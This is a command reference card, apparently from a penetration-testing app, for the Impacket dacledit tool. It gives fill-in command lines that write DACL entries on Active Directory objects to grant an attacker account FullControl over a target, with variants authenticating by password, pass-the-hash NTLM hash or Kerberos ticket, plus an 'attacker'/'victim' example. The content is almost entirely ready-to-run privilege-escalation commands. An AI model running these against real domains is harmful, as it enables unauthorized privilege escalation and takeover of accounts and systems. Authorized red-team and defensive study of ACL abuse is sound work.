Impacket dacledit

Read or write DACL entries on AD objects to grant or abuse ACL rights

Tool
impacket-dacledit
Category
Privilege Escalation / ACL / DACL Abuse
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-dacledit -action 'write' -rights 'FullControl' -principal '<user>' -target '<target>' '<domain>/<user>:<password>' -dc-ip '<ip>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-dacledit -action 'write' -rights 'FullControl' -principal '<user>' -target '<target>' -hashes ':<hash>' '<domain>/<user>' -dc-ip '<ip>'

Kerberos Ticket requires Kerberos ticket

impacket-dacledit -action 'write' -rights 'FullControl' -principal '<user>' -target '<target>' -k -no-pass '<domain>/<user>' -dc-ip '<ip>'

Read DACL requires password

impacket-dacledit -action 'read' -target '<target>' '<domain>/<user>:<password>' -dc-ip '<ip>'

Examples

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'attacker' -target 'victim' 'CORP.LOCAL/user:password' -dc-ip '192.168.1.100'

Tags

impacket dacl acl privilege-escalation write-dacl fullcontrol